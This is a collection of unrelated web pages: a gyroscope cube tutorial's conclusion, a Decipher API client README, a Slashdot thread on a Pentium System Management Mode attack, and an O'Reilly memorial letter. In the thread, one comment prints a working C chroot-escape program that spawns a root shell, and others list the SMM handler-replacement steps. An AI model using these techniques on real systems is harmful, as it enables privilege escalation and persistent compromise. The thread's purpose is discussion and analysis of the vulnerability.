- Read the rotational velocity from the gyroscope for each axis (X and Z axes are reversed because of the orientation of the sensor).
- If the measured velocity on a given axis is higher than inertia, we move the current velocity towards the measured value, in steps of at most acceleration.
- The current velocities are used to update the vertices, rotating them in 3D space and storing the resulting updated positions. This is necessary to ensure that the orientation of the view's axes remains aligned with the frame of the gyroscope.
- The display is drawn as before.
- Finally, we slide all velocities back towards zero, in steps of friction.
The end result is a 3D cube which responds to user input through the gyroscope, rotating along the appropriate axis. The inertia threshold means small movements are ignored, so you can flick it in a given direction and then return it slowly to its original place and it will continue to spin.
You can experiment with the inertia, acceleration and friction values to see what effect they have. There is no real physics at work here, so you can create some quite weird behaviours.
https://www.twobitarcade.net/article/gyroscopic-wireframe-cube/
Package for easier access to FocusVision's Decipher REST API
Project description
This package permits easier access to FocusVision’s Decipher tools REST API.
If you are a Decipher user, you can use the API to read and write your survey data, provision users, create surveys and many other tasks.
If you are not a FocusVision client, visit to learn more about our services.
Documentation
For an introduction to using the API, see this Knowledge Base article:
For current API reference documentation, see.
Quick Examples
Install the package:
sudo pip install decipher
You have three options to authenticate against the API:
Using an API Key: visit the Research Hub, and from the User Links menu (click on your picture in the upper right corner), select API Keys. Here you can provision a new API key for yourself or another user created just for API usage.
API keys last until revoked or rekeyed. This is the preferable method if you are using the API for automation.
If you only expect to use the API from the command line, you do not have to create an API key but can login to the system just as if you had logged into the user interface (thus it will expire after anywhere between 15 minutes to 24 hours depending on your company’s security settings). Here’s an example session:
$ beacon login
You can authenticate in one of three ways:
1. Enter an API key
2. Enter your username and password
3. Enter a long code (visible on the API key page)
q. Quit
Select 1, 2, 3 or q:
If you select option 1:
Enter your API key
API KEY: **p84443bmg06skt6ceawpq4xa9qxyx8jucuxk0fz5mxuwp1v4**
Enter your host, or press Enter for the default selfserve.decipherinc.com
Host: **yourprivatehost.decipherinc.com**
Testing your new settings...
Looks good. Settings were saved to the file /home/youruser/.config/decipher
If you select option 2:
Enter your full username (email address)
Username: **you@company.com**
Enter your password
Password: **password, not shown**
Enter your host, or press Enter for the default selfserve.decipherinc.com
Host: **yourprivatehost.decipherinc.com**
Testing your new settings...
Acquired a temporary session key. It will expire after 1439 minutes of idle time.
Looks good. Settings were saved to the file /home/youruser/.config/decipher
If you select option 3:
Visit (or private server equivalent)
Select 'generate temporary key' then paste it below
Temporary Key: **NDJiZD.....**
Testing your new settings...
Looks good. Settings were saved to the file /home/youruser/.config/decipher
The “login” action saves your API information in the file ~/.config/decipher.
From the command line you can now run the “beacon” script which lets you quickly run an API call:
beacon -t get rh/users select=id,email,fullname,last_login_from sort=-last_login_when limit=10
The above illustrates:
- An API call with method GET
- Targeting the “users” resource, which will be at /api/v1/rh/users
- Using the “projection” feature to select only 4 fields (id, email, full name and IP of last login)
- Using the “sorting” feature to order the response by descending time of last login
- Using the “pagination” feature to limit output to the first 10 entries
- Using the -t option to output the data as a formatted text table, rather than JSON.
If you replace the -t option with -p you will see the Python code needed for that same call:
from decipher.beacon import api

users = api.get("rh/users", select="id,email,fullname,last_login_from",
                sort="-last_login_when", limit=10)
for user in users:
    print("User #{id} <{email}> logged in last from {last_login_from}".format(**user))
Authentication
You need an API key to use the API if you are not using a temporary, time limited login. You can supply this key in 3 ways when connecting remotely:
By specifying it in the ~/.config/decipher file which has this format:
[main]
key=p84443bmg06skt6ceawpq4xa9qxyx8jucuxk0fz5mxuwp1v4
host=selfserve.decipherinc.com
The “main” section is the default, but you can select any other by using beacon -s othersection or setting api.section = “section” before calling any API functions.
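As an illustration of the file format (this is not part of the package itself), the example above can be parsed with Python's standard configparser; the key and host values below are the placeholders shown earlier:

```python
import configparser

# Placeholder values copied from the example ~/.config/decipher file above.
config_text = """
[main]
key=p84443bmg06skt6ceawpq4xa9qxyx8jucuxk0fz5mxuwp1v4
host=selfserve.decipherinc.com
"""

cfg = configparser.ConfigParser()
cfg.read_string(config_text)
print(cfg["main"]["host"])  # selfserve.decipherinc.com
```

Adding a second section (e.g. `[staging]`) with its own key and host is all that is needed to support the `-s` switch described above.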
By setting an environment variable:
export BEACON_KEY=1234567890abcdef1234567890abcdef
export BEACON_HOST=selfserve.decipherinc.com
Be aware that environment variables on most UNIX systems are visible to other programs running on the same machine.
By explicitly initializing the API with login information:
from decipher.beacon import api

api.login("1234567890abcdef1234567890abcdef", "selfserve.decipherinc.com")
API Versioning
Current API uses version 1. This package will only ever do version 1 calls. To opt-in to a newer version of the API, run (prior to doing any calls):
from decipher.beacon import api

api.version = 2
We do not expect to increase the API to version 2 any time soon unless new functionality cannot be added without using parameters with default values.
Command line options
The command line script has the following options:

 -v             verbose (show headers sent & received)
 -t             display output as an aligned text table
 -x             display output as XML
 -p             display Python code required to make the call
 -s <section>   use a section other than 'main' in the /home/youruser/.config/decipher file
 -V <version>   use a different API version
For example, to create a new API key for user bob@company.com, restricted only to the 8.8.8.8 IP address run:
beacon post rh/apikeys user=bob@company.com 'restrictions={"networks":["8.8.8.8"]}'
NOTE: Because of the way the shell manages quoting, you should surround parameters which are to be sent as objects with single quotes.
Data can be read from files rather than supplied on the command line. Use param=@filename to read the entire contents of the file “filename”. You can convert a tab-delimited file to an array of JSON objects using the syntax @filename@json. For example, if “data.txt” contains some data you want to upload into a survey, you can do:
beacon post surveys/your-survey/data/edit key=source data=@data.txt@json
Which will send along the contents of the tab-delimited data.txt but convert it into an array of JSON objects first.
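The package handles that conversion internally; a rough sketch of what @filename@json does to a tab-delimited file (the header row becomes the keys of each JSON object) might look like the following. The column names here are invented for illustration:

```python
import csv
import io
import json

# Hypothetical tab-delimited content; column names are made up for illustration.
tsv = "uuid\tstatus\nabc123\tcomplete\ndef456\tpartial\n"

# Each data row becomes one JSON object keyed by the header row.
rows = list(csv.DictReader(io.StringIO(tsv), delimiter="\t"))
payload = json.dumps(rows)
print(payload)
# [{"uuid": "abc123", "status": "complete"}, {"uuid": "def456", "status": "partial"}]
```

In practice you would read the file from disk rather than a string, but the shape of the resulting payload is the same.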
Similarly, using @filename.yml@yaml will parse the file as YAML.
Using @filename@64 will encode the file as base-64. This is useful for APIs like syslang/{language} which accept a base-64 encoded Excel file as input.
Meta-API
Meta-APIs like distribute/email let you take the output of one API call and feed it into another. Using distribute/email you can, e.g., generate one or more data files and have the results sent via email as an attachment.
The beacon script provides a shortcut to compose this from the command line, using the -m option. Calling beacon -m will, rather than performing the call, output the target and arguments in the object form consumed by meta-APIs like distribute/email.
Example composition with shell script:
DATAMAP=$(beacon -m get surveys/demo/report/tables/datamap format=html)
beacon post distribute/email sources=${DATAMAP}, recipients=joe@example.com, subject="Your daily datamap"
Here, the beacon -m option is used to put the string:
{"api": "/api/v1/surveys/demo/report/tables/datamap", "method": "GET", "args": {"format": "html"}}
into the $DATAMAP shell variable, which is then passed into a call to distribute/email.
Note there are some convenience features to create arrays used above: if a SIMPLE command line argument contains or ends with a comma, then it’s assumed to be a comma-separated list of strings. This works for something like “3,4,5” or “user@decipherinc.com,”.
If it starts with { (like the content of the DATAMAP variable) and ends with a comma, it's also wrapped in an array. Here we only look for a comma at the end of the argument – if we looked anywhere, splitting would likely destroy the JSON object.
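A rough sketch of those convenience rules (this illustrates the behaviour described above; it is not the package's actual parser):

```python
def parse_list_arg(value):
    """Apply the comma conveniences described above (illustrative only)."""
    # A JSON object followed by a trailing comma is wrapped in an array;
    # only the final character is inspected, so commas inside the JSON survive.
    if value.startswith("{") and value.endswith(","):
        return [value[:-1]]
    # Otherwise a comma means a comma-separated list of strings.
    if "," in value:
        return [v for v in value.split(",") if v]
    return value

print(parse_list_arg("3,4,5"))                  # ['3', '4', '5']
print(parse_list_arg("user@decipherinc.com,"))  # ['user@decipherinc.com']
print(parse_list_arg('{"format": "html"},'))    # ['{"format": "html"}']
```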
The corresponding Python code would be:
from decipher.beacon import api

datamap = api.get('surveys/demo/report/tables/datamap', format='html', meta=True)
print(api.post('distribute/email', sources=[datamap],
               recipients=["joe@example.com"], subject="Your daily datamap"))
Note the meta=True argument to the normal api.get call, which will not perform the call but return the meta-dictionary.
Using on a Beacon installation
You can use this script when logged into a Beacon instance, in which case authentication happens locally and automatically. While in a survey directory, use “beacon ./datamap format=html” – the ./ will be replaced with surveys/your/survey/path/ automatically.
https://pypi.org/project/decipher/
Pentium Computers Vulnerable to Attack? 227
Posted by ScuttleMonkey
from the sounds-like-more-work-than-it's-worth dept.
An anonymous reader writes "One of the latest security scares is coming from security experts at CanSecWest/core '06 in the form of a possible hardware-specific attack. The attack is based on the built-in procedure that Pentium based chips use when they overheat. From the article: 'When the processor begins to overheat or encounters other conditions that could threaten the motherboard, the computer interrupts its normal operation, momentarily freezes and stores its activity, said Loïc Duflot, a computer security specialist for the French government's Secretary General for National Defense information technology laboratory. Cyberattackers can take over a computer by appropriating that safeguard to make the machine interrupt operations and enter System Management Mode, Duflot said. Attackers then enter the System Management RAM and replace the default emergency-response software with custom software that, when run, will give them full administrative privileges.'"
the sky is falling (Score:5, Funny)
Re:the sky is falling (Score:2)
It's a frustrating article (Score:4, Interesting)
The presentation lists events that will trigger a System Management Interrupt (SMI) and enter System Management Mode (SMM). Overheating is only one of them. Another is "century rollover". Taken literally, that would mean that anyone who could set the clock to 11:59 December 31 1999 [I'd say 2000 but I doubt the chip is mathematically correct] can enter SMM without needing physical access to the machine or to the circuit breaker for the air conditioning. Or to use the presentation's example, outl(0xB2, 0x0000000F);.
If I read this problem report [monkey.org] correctly, then a process outside of SMM can write to the memory for SMM. (Controlled by the D_OPEN bit in the SMM control register).
So it looks like you can do it without physical access, where "it" is a privilege escalation that *starts* from root. That's getting less absurd all the time as virtualization and technologies like SELinux become more common. Also allows planting a deeper-than-root rootkit. You could escalate to God of Hardware or in the CanSecWest example to "root at securelevel -1".
Maybe I should email Duflot for details and write up something for my nerdish security blog [berylliumsphere.com]
Aren't you already screwed? (Score:5, Interesting)
Re:Aren't you already screwed? (Score:3, Informative)
Re:Aren't you already screwed? (Score:5, Funny)
Re:Aren't you already screwed? (Score:3, Insightful)
1. They don't NEED to do any of it because they already own your box
2. The system designers really fucked the pooch good on the security design of these components
Come on, even Windows knows that not just any Joe User should be able to reprogram the CPU interrupts...
Re:Aren't you already screwed? (Score:2, Insightful)
Re:Aren't you already screwed? (Score:2)
Re:Aren't you already screwed? (Score:2)
if you've got p4's installed in the machine, there's no need to fake anything, it's already in the package.
aside from joking, badly written software that puts way too much pressure on the cpu can overheat a badly ventilated machine. in some countries you just have to synchronize your attack with the weather conditions (over here it pops over 40C in the summer; a bit of load on the machine and it will overheat by itself, no torch needed).
and eventually there's no ultima
Re:Aren't you already screwed? (Score:2)
Re:Aren't you already screwed? (Score:3, Informative)
Think like an evil hax0r, then be afraid. (Score:5, Interesting)
> be used for is bypassing secure levels inside of OpenBSD, where you already have root.
People, think this through a bit and some more dangers appear. If root can replace System Management Mode there are some interesting possibilities for evil. SMM runs at permission levels beyond ring0, think of it as ring-1. From there you can escape any virtualization, any chroot jail, probably even escape from inside an emulator like VMWare if you can manage to execute the exploit without the emulation catching it and simulating it. Until this is completely understood and fixed, Xen, usermode linux, chroot and possibly VMWare/VirtualPC should be suspect.
Now imagine just how many people have root access to their virtual server at a hosting company and how many other users are running on the same physical hardware secure in the belief that their customer information is safe. But is it?
Re:Think like an evil hax0r, then be afraid. (Score:2)
chroot is *not* secure if attacker has root (Score:2)
If you've got root in a chroot "jail", you already own the machine. To break out of jail, just use a program such as the following (... and pass it a subdirectory within the "jail" as argument):
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char **argv)
{
    int i;
    if (argc < 2) {
        fprintf(stderr, "Bad argument count\n");
        exit(1);
    }
    if (chroot(argv[1]))
        exit(1);
    /* chroot() does not change the cwd, so walk up past the old root. */
    for (i = 0; i < 1024; i++)
        chdir("..");
    chroot(".");
    return execl("/bin/sh", "/bin/sh", (char *)NULL);
}
Re:Think like an evil hax0r, then be afraid. (Score:3, Insightful)
So does anything that can load before your kernel. (Like a boot sector virus.)
Now imagine just how many people have root access to their virtual server at a hosting company and how many other users are running on the same physical hardware secure in the belief that their customer information is safe. But is it?
This isn't really different than a boot sector. If you have root on a VIRTUAL server, you shouldn't have access to this or to the
Re:Think like an evil hax0r, then be afraid. (Score:3, Informative)
> the "real" OS)?
If it is a P-IV in a 1U rack I'd suspect all you would have to do would be chew CPU cycles like mad for a hour. It isn't that hard, most of the first batch of P-IV chips ran so hot they will only run at their rated speed for a few minutes without some serious aftermarket cooling solutions. So there are potentially a couple million machines out there which are especially vulnerable.
Re:Aren't you already screwed? (Score:2)
What about MMUs (Score:2, Informative)
Physical access (Score:4, Insightful)
Move along, folks.
Re:Physical access (Score:2)
"Physical access" is one of the reasons why wireless will never - well, not anytime soon, anyway - be fully secure.
Re:Physical access (Score:2)
Would you elaborate on that? I'm trying to understand the link between "Physical access" and "wireless".
I'm hoping that setting up an OpenBSD machine (sparc64) to be an AP where only authorized people who log into it through ssh are allowed access through it with authpf and then only IPSEC traffic, might be able to provide decent security.
Technically, you are correct. (Score:3, Interesting)
Having said that, I believe B3 security mandates that memory and other system resources have mandatory access controls for precisely this sort of reason - a user who already has sy
Re:Technically, you are correct. (Score:2)
Re:Physical access (Score:2)
The twist: the virus can set the overheat temp very low, so it's easy to trigger via the virus,
and the virus also does something akin to a BIOS flash that uploads a custom BIOS
instead of just nuking the BIOS like CMOS death did.
It's kinda like the firmware vulnerabilities that were present in some cheap routers
(and in Cisco's case, not so cheap).
It can be done remotely.
Ex-M
Sensational headline about a poor article. (Score:5, Informative)
Re:Sensational headline about a poor article. (Score:5, Interesting)
FCW stands for Federal Computer Week, a trade rag that US gov't stooges use to figure out how to best waste our tax dollars of shiny boxes with blinky lights. Their topic headings include the buzzwords:
The anonymous submitter might do well to remain so. Scuttlemonkey, OTOH, may have to enter the witness protection program. He's getting as bad as Zonk.
RAM access? (Score:3, Insightful)
How is it that an unprivileged user can write to such a sensitive location in the first place?
Security Experts Untie! (Score:5, Funny)
Good Times (Score:5, Funny)
Then a few years later, Microsoft brought us Outlook with automatic attachment opening, making the first part possible, and now Intel has given us the potential for the second part.
Good Times apparently wasn't a hoax, it was just ahead of its times.
Re:Good Times (Score:2)
I think Commodore beat everyone up in terms of being ahead of time...try 1977! [6502.org]
Re:Good Times (Score:2)
Well, "hardware attacks" existed before too. There were some that would send your screen a refresh rate it couldn't handle, and it'd be destroyed (this is back in the text-mode days). Of newer things, some viruses would overwrite the BIOS, which I believe required reflashing in laptops which didn't have a ROM copy to reset to. Th
Re:Good Times (Score:5, Insightful)
The watershed for me will always be the IE image exploits, where a malicious website could run code simply by your browser attempting to download a carefully crafted image file.
There I was, for years, telling people: "There's no way you can get a virus by just looking at a picture on the internet". Boy, was I wrong.
Bottom line: no matter what you pronounce impossible through software, invariably, somewhere out there, there exists a bug to accomplish just that.
Headbanger Virus (Score:3, Informative)
It was also based a little in reality - CPUburn could theoretically destroy an improperly heat-sinked
Re:Headbanger Virus (Score:2)
There was one that overwrote the park command so it didn't actually park the heads.
There was an Apple virus for the Apple IIc (I think, maybe an earlier model) that changed where the heads read the disk. This trick was also a great way to hide data.
There have been a couple of PC viruses that wrote to int 13. Another overwrote the MBR.
Now they are just inconvenient.
Re:Headbanger Virus (Score:2)
I looked into the possibility of using "dead space" (space left at the end of programs and other fixed-length files that canNOT be used by anything else), because when you load a program, you actually load complete sectors. It would have been easy to attach something to the disk int
Sensationalist (Score:5, Funny)
Along a similar vein, I have developed a martial art where I can kill anyone in one blow. It requires that my opponent is already tied-up, asleep, and I have a gun.
In other news... (Score:5, Funny)
Seriously, if they have access then you are screwed anyways...
- Andrew
Heh (Score:2)
Not being a retard still work, though? Right? (Score:4, Insightful)
Re:Not being a retard still work, though? Right? (Score:2)
If by firewall, you mean one made of masonry or asbestos, yes.
How do you even get it to overheat to begin with? (Score:2)
I heard, act of God includes "stupidity".
Re:How do you even get it to overheat to begin wit (Score:2)
Re:How do you even get it to overheat to begin wit (Score:2)
Re:How do you even get it to overheat to begin wit (Score:2)
Well, I generally like to compliment it on how pretty its power-on indicator is.
Then I might buy it something small, superfluous and pretty, like a tennis bracelet or an X800 Radeon.
After that I start gently caressing its biometric module.
That generally gets it pretty hot...
The devil is in the details (Score:5, Insightful)
- The article states that all x86 processors "could" be vulnerable. Does that mean the *entire* series of Pentium chips, even the older PIII and PII's? If so, are they equally as easy to compromise as the modern versions?
- There is no mention of AMD architecture. Doesn't AMD have an equivalent "overheat failsafe" halt-and-cooldown function? Wouldn't that make AMDs vulnerable to this type of exploit as well, or do they require a slightly different attack?
- Isn't the motherboard BIOS FlashROM responsible for the monitoring of and responding to dangerous CPU temperatures? Haven't they already been safeguarded against unauthorized writes, due to the Chernobyl virus?
I think I'll hold off on ordering the prototype Borg implants when they come on the market....
Not Very Long Lived... (Score:2)
Re:Not Very Long Lived... (Score:2)
What Microsoft said... (paraphased) (Score:2)
Good thing macs aren't vulnerable. (Score:5, Funny)
A few more details (Score:5, Informative)
Re:A few more details (Score:5, Informative)
Linux and *BSD have a /dev/mem device interface for accessing physical memory from user space. Usually, this device only allows access from a privileged user.
Using /dev/mem, it should be possible to access the address range assigned to System Management RAM. However, the CPU has a Model-Specific Register (MSR) for enabling and disabling accesses to SMRAM. The instructions used to read and write MSRs (RDMSR and WRMSR) must be executed from ring-0 (kernel level) or else a GPF occurs. However, the Linux kernel can be configured to provide a user-level interface to MSRs.
Again, you'll probably need root privileges to access the device.
Re:A few more details (Score:2)
Who says the system management ram is accessible by MSRs?
Seems like there isn't enough on-die space to save the entire state of the O/S, and MSR writing is painfully slow, so it wouldn't have time to dump everything INSIDE the core before triggering thermal protection.
More details? Anyone? Anyone?
exploit schmexploit (Score:2)
I ran it, and now my computer is "resting" for a few days.
Take that Loic Duflot
(if you want the link, just let me know, and when I boot up my new 6, I'll send it to you)
--
I just put some lightnin' in my Dell
Semi Permanent Backdoor? (Score:3, Insightful)
Or am I confused?
A "1" (Score:2)
Sure it is probably possible, but then I suppose it would be possible to retrofit my truck into a boat. Heck, it would probably be easier and faster to do that than it would be to
UNIVAC had similar vulnerability in checkpoint (Score:4, Interesting)
The crack:
1. Checkpoint your job to tape.
2. remount tape.
3. fiddle the executive-mode bit in the dumped status register.
4. remount tape.
5. restart job -- mainframe p0wn3d.
Of course, in those days, a student that could do that was quickly hired into the system programming staff so that they could keep a closer eye on him and also get some productive work from him.
Ohh... BTW... if you can find an 1100/10 these days, it won't work any more. They fixed that about the same time they quit making CPU's out of vacuum tubes.
I wish Intel would create new bugs, instead of just repeating old ones. Copycats.
Just think, the script kiddies that pulled this off are now drawing Social Security.
I'm Safe (Score:2, Funny)
Not only do you receive a convenient olfactory signal to alert you to the situation, but you also avoid security breaches brought on by overly complex thermal management.
i heard about this! (Score:2)
Recommended work around (Score:2)
All Pentiums also vulnerable to DoS (Score:5, Funny)
Pentium based machines are also vulnerable to a denial of service attack from a hacker with physical access to the machine and in the possession of a large axe. Should the attacker be wielding a pair of axes (one in each hand) then the attack would constitute a distributed denial of service.
Next James Bond movie script excerpt: (Score:2)
evil hacker spotted... (Score:2)
film at 11
Better article: no FUD-OpenBSD demo-Theo comment (Score:4, Informative)
cansecwest/core06: "security issues related to Pentium SMM"
Loic Duflot
Title: Security Issues Related to Pentium System Mgmt Mode
It is day 2 at Cansecwest and this talk wins for 'so frightening that you want to hide under your desk in the fetal position'.
I'll go through the high-level technical details and then end by pointing out a principle that is one of those universal truths I carry around with me everywhere.
This entire exploit is based on documented x86 functions.
Your CPU runs in a few modes; one of those is known as Protected Mode, another as System Management Mode. When your OS is running, you're in Protected Mode, and this is where much of the security is enforced (you'll hear of ring0 and ring3). Just know that your in-world universe is in Protected Mode.
System Management Mode (SMM) is used so that when something external to your OS world (say, a thermal condition) needs to communicate a message, the CPU saves out all its Protected Mode state, does all this SMM stuff, and then returns to its regularly scheduled program in Protected Mode.
There are details that involve register addresses and very low-level operations, but for the most part a system in a very secure state can be circumvented via this SMM facility. I'm talking free access to all memory and IO.
The song goes a little like this:
Enable SMI
Open SMRAM space
Replace default SMI Handler by custom one (do your duty)
Close SMRAM space
Trigger SMI
Gain access to restricted operations.
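As a rough illustration, the sequence above might be sketched in pseudocode (illustrative only: register and bit names such as D_OPEN come from the chipset discussion elsewhere in the thread, and exact offsets vary by chipset):

```
; Pseudocode sketch of the six steps above -- not runnable code.
enable SMI generation in the chipset
set the D_OPEN bit in the SMRAM control register   ; map SMRAM into the normal address space
copy a custom handler over the default SMI handler in SMRAM
clear the D_OPEN bit                               ; hide SMRAM again
outl(0xB2, 0x0000000F)                             ; write the APM command port to trigger an SMI
; the CPU enters SMM and runs the attacker's handler with full hardware access
```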
In the wider picture: this works on most systems. It turns out that Linux and the *BSDs will fall victim to this attack strategy; however, Windows XP is not known to be exploitable because a few system calls are not present and, more importantly, a certain memory range in Protected Mode does not share addresses with SMM.
So, for the demo, they did not pick some shabby OS to exploit. How about OpenBSD at level2 (high security) with allowaperture=1
Ummm...it worked. Theo, microphone please?
Theo spoke to this OpenBSD issue and said he and the team have known about it for a year. They are between a rock and a hard place because the X server is really the core of the problem. It has too much damn access to registers and sits in the most unfortunate address space in Protected Mode, because when in SMM, what is in that address range can be used to exploit.
The solution is for the X server people to abstract sufficiently so that the kernel can have more governance over the X server's logic.
Closing TK comments:
A system or a world that has a policy governed by in-world mechanisms cannot be effective when a process in-world can reach out to the out-world to cause in-world change. You could also say that since a problem cannot be resolved at the same logical realm in which it was created, the most effective governance of a world can only come from outside that world. Think about all the crazy things we do in the physical world. As soon as we could get to the strong and weak forces at the atomic level, we created an incredibly destructive device. I just hope that if string theory is right and there really are energy strings at the lowest level of the universe, no one in our world gets control of them. The negative outcome caused by the power hungry is too high a risk to even consider the positive benefits.
It's late and I have been blogging way too much today; I am certain that my mental packet loss is abnormally high. I'll return to these in-game/out-game concepts later in another blog entry, when I am less sleep-deprived.
--tk
Not really an exploit (Score:3, Insightful)
By the way, whenever the CPU does a memory read or write while in SMM, it asserts the SMM# pin. This means that
Too much hassle (Score:2)
Works just as fine.
reminds me attacking VM's via physical memory... (Score:2)
Yea, it was
This guy shouldn't be allowed to write... (Score:2)
Where to begin.
First off, none of the low-power states C0->C4 stash to a system management RAM (yet). Second, the lower Cx states flush the cache, but they don't flush in response to heat, in that case they perform a Geyserville transaction which lowers frequency and voltage. Only if you exceed the thermal diode does it go tits-up. Now there's word it may save state in future Cx states, but I sincerely doubt anyone would be able to get inside the on-die ram, since it will sit beh
Concern (Score:2)
However, if you attack the driver of a secure card at the same time as you are thermally stressing it, you may be able to take it over, extracting the key data without triggering the tamper evident seals.
Fortunately, security cards that I am familiar with do NOT use Intel
Re:FUD? (Score:2)
Re:FUD? (Score:5, Insightful)
When the processor begins to overheat or encounters other conditions that could threaten the motherboard, the computer interrupts its normal operation, momentarily freezes and stores its activity,
Ok, fine.
Every computer that runs on x86 chip architecture may be vulnerable to this attack
Wait. How did we get here?
Let's go through this, again. Intel Pentium 4s are hot. No surprise there. They enter special modes when overheating that may introduce a security vulnerability. Fine. How does this cross over to AMD and Via chips again? AMD and Via processors don't have special modes like that. If system heat becomes critical they will simply shut the system down flat out. On a Pentium 4, overheating is not entirely unexpected, particularly on the high edge of the clock speeds. On an AMD or Via, overheating is a major failure condition, probably caused by a heatsink falling off.
So, how are all x86 chips vulnerable, exactly? (Incidentally, between this and this [daemonology.net], AMD is really looking to be a much safer deal, not to mention faster, cooler, more power efficient, etc.)
Re:FUD? (Score:3, Informative)
You are a little off. What a P4 does is "speed stepping" where if it is overheating it will down the clock and avoid areas on the chip that are the hottest, if it gets too hot it will shut down completely. This is desi
Re:FUD? (Score:2)
Yeah, because heatsinks coming unlatched all by themselves and falling off has been shown to be a common occurence.
Re:FUD? (Score:3, Interesting)
It happened to my wife's computer. The case is behind her desk, so I'm pretty sure nobody was picking it up and dropping it. One day it started spontaneously turning off after only a few minutes of use. After a little frustration at not even being able to complete any diagnostics on my CD, I finally pulled the desk out and opened the case up. I found the heatsink hanging from one peg, and the
Re:FUD? (Score:2)
Years ago I scored myself an Athlon 700 which was thrown out. When I got it home, guess what... heatsink had become unlatched and fell off enough to lose contact with the CPU. I fixed the dodgy latch hooks and it's been great for the past 4 years or so.
The person who threw it out was probably fed up with the few minutes of uptime they could get. ; )
Re:FUD? (Score:2)
Re:FUD? (Score:3, Informative)
AMD added this feature in the Athlon XP (maybe not th
Re:FUD? (Score:2)
FYI (Score:2)
New AMD (Sempron 64/Athlon 64/Athlon X2 64, Turion) all have "Cool N' Quiet" built in which throttles the chip down to speeds as low as 1Ghz (even lower on Turions I think) when idle. I have a dual core athlon system now, and my chip sits at 1Ghz/1
Re:FYI (Score:2)
Are you sure it was motherboard makers and not Microsoft with Windows?
Re:FUD? (Score:2)
Re:FUD? (Score:2)
So every now and then the CPU fan would crap. This was only an AMD K6-2 500Mhz chip but when that baby got hot, Windows 2K would BSOD like crazy. That was my cue to go out and buy another fan for $5.00. Hey, they lasted a year or so each so no big deal.
So that's how AMD chips respond to overheat, at least in my experience.
Re:FUD? (Score:2)
It dumps heat quite well. And I do have a job,very nice one in fact. And the ad hominem attack wasn't very nice. I'm going to have to tell your momma.
AMD overheat (Score:2)
As a longtime AMD and VIA user, I would call bullshit on that. With VIA, certainly (my Epias are rather low power, lower heat), but most of my AMD's have run rather hot-ish
K6-2/400 - Same as P-II
"Thunderbird" 700Mhz - Not hot, but no cooler than the same-gen Pentiums.
Duron 1Ghz - Power-hungry and hot enough to raise the room temperature noticeably when run in a server
Athlon XP 2500+ - Holy-freakin' he
Re:FUD? (Score:2)
FUD? Judge for yourself. (Score:2)
So, here's a link to the actual PowerPoint presentation [cansecwest.com]. Don't just click on it without reading the caveats below.
He has a sample exploit there on an OpenBSD system.
Here's the guy's bio from the talk:
Loïc Duflot
Security Issues related to Pentium System Management Mode
Loïc Duflot is a security enginee
Re:FUD? (Score:2)
Naw, AMD chips don't enter hardware interrupt mode when they overheat, they violently explode:
[azfar.name.my]
Re:Isn't it about time (Score:2)
Fear the consequences of creating Pentium chips? I'm no fan of Intel, myself, but that seems a bit extreme.
Re:Isn't it about time (Score:2)
parent is obviously scared by computers and computer crime. news flash, all computers have some sort of security problem. you can't lock people up and think that will solve all the computer security problems so you can sleep well at night. people who are clueless about computers advocate such hard line policies. it's ignorance and fear and wanting to do something -anything- no matter how completely irrelevant and meaningless that action is.
Re:Isn't it about time (Score:2)
Also, many of the people doing these things are stupid kids. Come on, $25 for a 10,000 node botnet? That's someone who wants money to play whatever online game is hot these days, not someone
Re:Isn't it about time (Score:2)
Re:Isn't it about time (Score:2)
Re:Isn't it about time (Score:2)
"No sprinkles. For every sprinkle I find, I shall kill you."
Re:Remember the F00F bug? (Score:2)
Uh, no (Score:2)
Re:But how? (Score:2, Interesting)
SMM is present on many x86 processors and dates back to the days of NexGen and Cyrix and 486s. It is basically a real-mode-like state of the x86 processor where certain hardware emulation type operations are performed.
The SMM software usually resides at A000:0000, which is normally video memory in a PC. However, in SMM the address decoder actually maps those addresses to physical RAM and runs the SMM k
Re:I think Im covered (Score:2)
Re:Wait wait wait (Score:3, Interesting)
Come to think of it, I had an old HP that integrated a fan controller on the motherboard. It might have been hardware-only, though.
Seems like a lot of hacking for a small payoff, but I think the path is there for some systems.
Re:Wait wait wait (Score:2)
It's possible to kill the daemon or boot up without launching it, but in the event of this, the hardware has a "fail s
ummm (Score:2)
http://slashdot.org/story/06/04/11/1655257/pentium-computers-vulnerable-to-attack?sdsrc=prevbtmprev
Dear Customers and Friends,
O'Reilly editor in chief Frank Willison suffered a heart attack and died the morning of July 30th. This is a tragedy.
Of all of us at O'Reilly, Frank is the one we'd most have imagined growing old and grandfatherly, dispensing to successive generations the wisdom, humor and caring that he shared with all of us. He is (I use the present tense deliberately) one of those people who is an inspiration to us all, someone who demonstrates convincingly how to be a wonderful human being.
In times like these, I find comfort in a passage from Wallace Stevens:.
The passing of our heroes (and Frank was one of my heroes and mentors, as I'm sure he was for so many of you as well) reinforces in us the knowledge that what matters is not the time or manner of our passing, but the way we lived. Frank lived in a way we would all be proud to live; I'm sure he continues on to his next adventure with the same light and curious touch.
We will all miss Frank very painfully in the days, weeks, months, and years to come. But what he gave to each of us will remain as part of the treasure each of us stores up in our life, and hopefully passes on to those around us, as Frank was so ready to do.
In parting, I'd like to share two things with you. The first is a collection of fragments from Frank's emails and columns. His writing was anticipated and collected by O'Reilly employees because of the wit, wisdom, humor, and humanity he wrote with. O'Reilly PR director Lisa Mann kept the file these come from. Around the company the file was known as "The Best of Frank."
Secondly, O'Reilly CTO Jon Orwant put together a memorial Web site where people can share their favorite memories of Frank. I encourage you to do so if you've got something to share.
Go well, Frank. --Tim
The Best of Frank
On MP3 Filesharing
Kevin Bingham wrote: "Hold on. Haven't I read somewhere that a large percentage of Napsterites (can I say that?) are over 30?"
Frank wrote: "You're thinking of nappers. I listen to loud music all the time: Tower of Power, Little Feat, Van Morrison, and Paul Butterfield all sound great loud. I like that boom boom boom boom--it provides sensation for the lower half of my body in a healthful and socially acceptable form. But the boom boom boom boom has to be crisp; it can't be muddy (that is, I don't want boowhoom boowhoom). If Rocco Prestia is going to play 400 bass notes a second, I want to hear each one. MP3 doesn't quite deliver yet."
On Technothrillers
"On the airplane trip out, I began reading Acts of the Apostles, by John F.X. Sundman.."
On the Other Hand...
"As for the larger question of whether our books are suitable for learning how to program: I was first going to contradict what 'the publisher' said in his article, but then I noticed that he was quoting me. I quickly changed my strategy."
On the French
."
Late at Night
